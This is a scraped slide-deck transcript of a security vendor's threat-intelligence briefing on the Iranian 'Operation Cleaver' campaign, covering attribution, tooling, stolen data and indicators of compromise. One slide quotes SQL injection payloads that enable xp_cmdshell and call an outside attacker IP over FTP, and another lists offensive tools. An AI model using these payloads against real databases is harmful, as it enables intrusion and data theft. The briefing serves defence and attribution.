Presentation is loading. Please wait.

Presentation is loading. Please wait.

Operation Cleaver Iran is the next China. Numerous references inside the namespaces of their custom bot code codenamed TinyZbot e.g.: e:\projects\cleaver\trunk\zhoupin_cleaver\obj\x86\release\netscp.pdb.

Published byIsmael Norrington Modified over 9 years ago

Similar presentations

Presentation on theme: "Operation Cleaver Iran is the next China. Numerous references inside the namespaces of their custom bot code codenamed TinyZbot e.g.: e:\projects\cleaver\trunk\zhoupin_cleaver\obj\x86\release\netscp.pdb."— Presentation transcript:

1 Operation Cleaver Iran is the next China

2 Numerous references inside the namespaces of their custom bot code codenamed TinyZbot e.g.: e:\projects\cleaver\trunk\zhoupin_cleaver\obj\x86\release\netscp.pdb PDBs associated with the hacker name “Jimbp” e.g.: c:\users\jimbp\desktop\binder_1 - for cleaver\binder_1\obj\x86\release\setup.pdb PDBs associated with the keystroke loggers, artifacts, and numerous other tools, e.g.: e:\Projects\Cleaver\trunk\MainModule\obj\Release\MainModule.pdb Why “Cleaver”? The name…

3 Targeting of Critical infrastructure globally. Shocking Level of access. Network. Systems. Applications. Databases. DNS. Paypal. GoDaddy. Basically Everything. Why Now? Exposing Cleaver…

4 Prior to 2010, Iran as a target was almost non-existent and as the attacker mentioned only in terms of website defacement In 2010, Stuxnet was realized, severely impacting Iran’s Nuclear program Retaliation began… Cleaver is an Iranian born campaign dating to 2012, with some data from 2007. Since Shamoon, we have witnessed an evolution of skillset and threat actor IRAN CYBER ATTACKS Exposing Cleaver…

5

6 Sourcing Iranian GeoIP Location: Iran Net block: 78.109.194.96 - 78.109.194.127 Owner: Tarh Andishan Email: tarh.andishan(at)yahoo.com Phone: +98-21-22496658 NIC-Handle: TAR1973-RIPE Tarh Andishan – meaning “Innovators”, “Inventors” 78.109.194.96/27 – Current – Afranet, Iran 217.11.17.96/28 - 10/22/2014 – Afranet, Iran 81.90.144.104/29 - 10/5/2014 – Afranet, Middle East Oil, Iran 31.47.35.0/24 – 11/2012 – Afranet, Iran The logger module binary’s file description value is the following: ye file khube DG. ba in ham kari nadashte bashin Roughly translated from Persian, this text says: DG is a good file, don’t bother with this Starting Nmap 6.25 at 2012-08-17 09:18 Iran Daylight Time Netafraz.com infrastructure in Iran Persian hacker names: Salman Ghazikhani, Bahman Mohebbi, Kaj, Parviz, Alireza, etc.

7 IranRedline.org In one of IranRedLine.org’s blog posts, the author speculates on Tarh Andishan’s involvement with the Iranian government by showing close proximity to SPND, the Organization of Defensive Innovation and Research Sourcing Tarh Andishan

8 TTPs SQL Injection http://localhost/Demos/demo.cfm?Edit%26ID=111;declare%20@b1%20varchar(8000);set%20@ b1=%20show advanced options;declare%20@b2%20varchar(8000);set%20@b2=%20xp_ cmdshell;%20EXEC%20master.dbo.sp_configure%20@b1,%201;RECONFIGURE;EXEC%20master.dbo.sp_configure%20@b2,%201;RECONFIGURE;--%20 http://localhost/Demos/demo.cfm?Edit%26ID=111;declare%20@b1%20varchar(8000);set%20@ b1=%20ftp -A 108.175.152.230;%20exec%20master..xp_cmdshell%20@b1--%2

9 TTPs Spearphishing: fake resume tool

10 TTPs Spearphishing: Resume Submitter

11 Escalation and Pivoting Tools and Toys… Public: Netcat, Cain & Abel, psexec, Mimikatz, WCE, Putty, Plink, nmap, xcmd, etc. Custom: TinyZbot, NetC, ASPX webshells, SYN flooder, ARP poisoning, Csext, etc. Exploits: MS08-067 (Conficker) and MS10-015 (KiTrap0D)

12 Signing encryption keys for major airline company Usernames and passwords from dozens of companies 250k Windows credentials at a single Oil company Airport and Airline crew credentials Airport network configuration files SNMP credentials for major Energy Companies Student information targeting Access and Exfil The damage…

13 Indicators of Compromise (IOCs) Let’s go hunting… or preferably PREVENTING! Domains doosan-job(dot)com downloadsservers(dot)com drivercenterupdate(dot)com easyresumecreatorpro(dot)com googleproductupdate(dot)com googleproductupdate(dot)net kundenpflege.menrad(dot)de microsoftactiveservices(dot)com microsoftmiddleast(dot)com microsoftonlineupdates(dot)com microsoftserverupdate(dot)com microsoftupdateserver(dot)net microsoftwindowsresources(dot)com microsoftwindowsupdate(dot)net northropgrumman(dot)net teledyne-jobs(dot)com windowscentralupdate(dot)com windowssecurityupdate(dot)com windowsserverupdate(dot)com windowsupdateserver(dot)com www.gesunddurchsjahr(dot)de Emails for Domain Registration davejsmith200(at)outlook.com salman.ghazikhani(at)outlook.com btr.8624(at)yahoo.com ghanbarianco(at)gmail.com azlinux73(at)gmail.com domain(at)netafraz.com tarh.andishan(at)yahoo.com ahmadi(at)odeconline.com kafe0(at)yahoo.com dg_co(at)yahoo.com zahiry_alireza(at)yahoo.com zahiry.alireza(at)gmail.com Emails used for Exfiltration testmail_00001(at)yahoo.com TerafficAnalyzer(at)yahoo.com dyanachear(at)beyondsys.com 50.23.164.161 64.120.128.154 64.120.208.74 64.120.208.75 64.120.208.76 64.120.208.78 64.120.208.154 66.96.252.198 78.109.194.114 80.243.182.149 87.98.167.71 87.98.167.85 87.98.167.141 88.150.214.162 88.150.214.166 88.150.214.168 88.150.214.170 95.211.191.225 95.211.191.247 95.211.241.249 95.211.241.251 108.175.152.230 108.175.153.158 159.253.144.209 173.192.144.68 174.36.195.158 184.82.158.18 184.82.181.48 188.227.180.213 192.111.145.197 203.150.224.249 207.182.142.68 212.87.154.12 212.87.154.14 Mutexes ZSC1 Adobe Report Service Bmgr Dynamic Mutexes demdaramdidam ILoveThisMutex Installed Services Names COM+ System Extentions COM__System_Extentions Network Connectivity Manager Service1 MsNetMonitor Pcapins scManagerSvc CredentialSync Adobe Report Service IP Addresses

14 Resources “Operation Cleaver” Report Cylance Blog Twitter: @cylanceinc Twitter: @hackingexposed Email: opcleaver@Cylance.com for more information Yara rules on Cylance.com Test Drive CylancePROTECT: my.cylance.com

Download ppt "Operation Cleaver Iran is the next China. Numerous references inside the namespaces of their custom bot code codenamed TinyZbot e.g.: e:\projects\cleaver\trunk\zhoupin_cleaver\obj\x86\release\netscp.pdb."

Similar presentations

1 Radio Maria World. 2 Postazioni Transmitter locations.

1 Radio Maria World. 2 Postazioni Transmitter locations.
AKC Rally Signs These are copies of the 2012 AKC Rally signs, as re-drawn by Chuck Shultz. Use them to print your own signs. Be prepared to use a LOT of.

AKC Rally Signs These are copies of the 2012 AKC Rally signs, as re-drawn by Chuck Shultz. Use them to print your own signs. Be prepared to use a LOT of.
Números.

Números.
Trend for Precision Soil Testing % Zone or Grid Samples Tested compared to Total Samples.

Trend for Precision Soil Testing % Zone or Grid Samples Tested compared to Total Samples.
Trend for Precision Soil Testing % Zone or Grid Samples Tested compared to Total Samples.

Trend for Precision Soil Testing % Zone or Grid Samples Tested compared to Total Samples.
AGVISE Laboratories %Zone or Grid Samples – Northwood laboratory

AGVISE Laboratories %Zone or Grid Samples – Northwood laboratory
Trend for Precision Soil Testing % Zone or Grid Samples Tested compared to Total Samples.

Trend for Precision Soil Testing % Zone or Grid Samples Tested compared to Total Samples.
Fill in missing numbers or operations

Fill in missing numbers or operations
2 20 107 1 106 13 19 21 25 22/24 3 12 14 23 4 11 15 26 27 30 5 7 6 9 16 18 28 104 29 8/17 32/109 100 99 105 108 31 34 40/42 41 98 68 93 90/92 91 81 80.

/ /17 32/ / /
Reflection nurulquran.com.

Reflection nurulquran.com.
EuroCondens SGB 125- 300 E.

EuroCondens SGB E.
Worksheets.

Worksheets.
Addition and Subtraction Equations

Addition and Subtraction Equations
Multiplication X 1 1 x 1 = 1 2 x 1 = 2 3 x 1 = 3 4 x 1 = 4 5 x 1 = 5 6 x 1 = 6 7 x 1 = 7 8 x 1 = 8 9 x 1 = 9 10 x 1 = 10 11 x 1 = 11 12 x 1 = 12 X 2 1.

Multiplication X 1 1 x 1 = 1 2 x 1 = 2 3 x 1 = 3 4 x 1 = 4 5 x 1 = 5 6 x 1 = 6 7 x 1 = 7 8 x 1 = 8 9 x 1 = 9 10 x 1 = x 1 = x 1 = 12 X 2 1.
Division ÷ 1 1 ÷ 1 = 1 2 ÷ 1 = 2 3 ÷ 1 = 3 4 ÷ 1 = 4 5 ÷ 1 = 5 6 ÷ 1 = 6 7 ÷ 1 = 7 8 ÷ 1 = 8 9 ÷ 1 = 9 10 ÷ 1 = 10 11 ÷ 1 = 11 12 ÷ 1 = 12 ÷ 2 2 ÷ 2 =

Division ÷ 1 1 ÷ 1 = 1 2 ÷ 1 = 2 3 ÷ 1 = 3 4 ÷ 1 = 4 5 ÷ 1 = 5 6 ÷ 1 = 6 7 ÷ 1 = 7 8 ÷ 1 = 8 9 ÷ 1 = 9 10 ÷ 1 = ÷ 1 = ÷ 1 = 12 ÷ 2 2 ÷ 2 =
Update on IPv4 Address Transfers NANOG 55 - 6 June 2012 John Curran CEO, ARIN.

Update on IPv4 Address Transfers NANOG June 2012 John Curran CEO, ARIN.
IPv4 Address Sales and Emerging Market for Address Space Winter 2012 ESCC/Internet2 Joint Techs John Curran President and CEO, ARIN.

IPv4 Address Sales and Emerging Market for Address Space Winter 2012 ESCC/Internet2 Joint Techs John Curran President and CEO, ARIN.
Random Number Generator (RNG) for Microcontrollers

Random Number Generator (RNG) for Microcontrollers
1 When you see… Find the zeros You think…. 2 To find the zeros...

1 When you see… Find the zeros You think…. 2 To find the zeros...
EQUS Conference - Brussels, June 16, 2011 Ambros Uchtenhagen, Michael Schaub Minimum Quality Standards in the field of Drug Demand Reduction Parallel Session.

EQUS Conference - Brussels, June 16, 2011 Ambros Uchtenhagen, Michael Schaub Minimum Quality Standards in the field of Drug Demand Reduction Parallel Session.

Similar presentations

Ads by Google